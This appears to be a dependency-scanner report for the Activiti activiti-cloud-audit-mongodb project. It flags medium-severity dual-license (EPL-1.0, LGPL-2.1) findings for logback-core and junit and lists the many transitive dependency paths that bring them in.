Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22
Dual license: EPL-1.0, LGPL-2.1
medium severity
- Module: ch.qos.logback:logback-core
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-logging@7-201802-EA › net.logstash.logback:logstash-logback-encoder@4.11 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
Dual license: EPL-1.0, LGPL-2.1
medium severity
- Module: junit:junit
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › junit:junit@4.13.2
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › junit:junit@4.13.2
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10 › junit:junit@4.13.2
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10 › jmock:jmock@1.0.1 › junit:junit@4.13.2
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10 › junit:junit@4.13.2
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10 › junit:junit@4.13.2
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10 › jmock:jmock@1.0.1 › junit:junit@4.13.2
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10 › jmock:jmock@1.0.1 › junit:junit@4.13.2
-
